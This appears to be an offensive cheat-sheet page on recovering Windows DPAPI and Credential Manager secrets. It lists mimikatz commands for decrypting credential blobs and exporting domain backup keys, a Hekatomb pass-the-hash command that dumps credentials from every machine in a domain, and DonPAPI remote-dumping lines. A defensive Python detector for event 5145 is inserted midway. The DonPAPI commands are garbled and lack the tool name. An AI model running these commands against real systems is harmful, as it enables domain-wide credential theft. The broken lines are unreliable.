Microsoft Windows Data Protection API

Windows - DPAPI #

On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft’s Data Protection API and stored as “blob” files in the user's AppData folder.

Data Protection API #

  • Outside of a domain: the user’s password hash is used to encrypt these “blobs”.
  • Inside a domain: the domain controller's master key is used to encrypt these blobs.

With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows Credentials Manager of all the workstations in the domain.

vaultcmd /list

VaultCmd /listcreds:<namevault>|<guidvault> /all
vaultcmd /listcreds:"Windows Credentials" /all

List Credential Files #

dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Mimikatz - Credential Manager & DPAPI #

# check the folder to find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*

# check the file with mimikatz
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
# find master key
mimikatz !sekurlsa::dpapi
# use master key
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

# find and export backup keys
lsadump::backupkeys /system:dc01.lab.local /export
# use backup keys
dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk

Hekatomb - Steal all credentials on domain #

Processus-Thief/Hekatomb is a Python script that connects to the LDAP directory to retrieve all computer and user information. It then downloads all DPAPI blobs of all users from all computers. Finally, it extracts the domain controller private key through RPC and uses it to decrypt all credentials.

pip3 install hekatomb
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@ -debug -dnstcp
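A detection sketch for the collection step described above, as an added example that is not part of the original page or of Hekatomb: it flags a source address that reads other users' DPAPI folders over SMB on several hosts. It assumes Detailed File Share auditing (Security event 5145) is enabled and exported as flat records; the record layout, the `ev` helper, the sample events and the `min_hosts` threshold are assumptions.

```python
import re
from collections import defaultdict

# DPAPI folders named on this page, relative to a user profile (lower-cased).
DPAPI_DIRS = (
    r"appdata\local\microsoft\credentials",
    r"appdata\roaming\microsoft\credentials",
    r"appdata\roaming\microsoft\protect",
)
OWNER_RE = re.compile(r"(?:^|\\)users\\([^\\]+)\\")  # profile owner in the path


def ev(computer, ip, user, path):
    """Build one constructed, flattened 5145 record (layout is an assumption)."""
    return {"EventID": 5145, "Computer": computer, "IpAddress": ip,
            "SubjectUserName": user, "RelativeTargetName": path}


BLOB = r"AppData\Roaming\Microsoft\Credentials\PLACEHOLDER_BLOB_NAME"
SAMPLE_EVENTS = [  # constructed sample data, not real logs
    ev("ws01.lab.local", "10.0.0.50", "administrator", "Users\\alice\\" + BLOB),
    ev("ws02.lab.local", "10.0.0.50", "administrator", "Users\\bob\\" + BLOB),
    ev("ws03.lab.local", "10.0.0.50", "administrator",
       r"Users\carol\AppData\Roaming\Microsoft\Protect\PLACEHOLDER_SID\PLACEHOLDER_GUID"),
    ev("ws02.lab.local", "10.0.0.50", "administrator", r"Users\bob\Documents\notes.txt"),
    ev("fs01.lab.local", "10.0.0.21", "dave", "Users\\dave\\" + BLOB),    # own profile
    ev("ws01.lab.local", "10.0.0.30", "helpdesk", "Users\\alice\\" + BLOB),  # single host
]


def dpapi_sweeps(events, min_hosts=3):
    """Map source IP -> hosts where it read another user's DPAPI folders,
    keeping only sources seen on at least min_hosts distinct hosts."""
    hosts_by_src = defaultdict(set)
    for e in events:
        if e.get("EventID") != 5145:
            continue
        path = e.get("RelativeTargetName", "").replace("/", "\\").lower()
        if not any(d in path for d in DPAPI_DIRS):
            continue
        owner = OWNER_RE.search(path)
        if owner and owner.group(1) == e.get("SubjectUserName", "").lower():
            continue  # a user reading their own profile (e.g. roaming) is expected
        hosts_by_src[e["IpAddress"]].add(e["Computer"].lower())
    return {s: sorted(h) for s, h in hosts_by_src.items() if len(h) >= min_hosts}

if __name__ == "__main__":
    for src, hosts in dpapi_sweeps(SAMPLE_EVENTS).items():
        print(f"{src} read DPAPI material of other users on {len(hosts)} hosts: {hosts}")
```

Tune `min_hosts` to the environment: backup agents and profile-migration tools can legitimately touch these folders across many machines and should be allow-listed by source.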

DonPAPI - Dumping DPAPI credz remotely #

domain/user:passw0rd@target
--hashes <LM>:<NT> domain/user@target

# using domain backup key
backupkeys --export -t domain/user:passw0rd@target_dc_ip
python -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
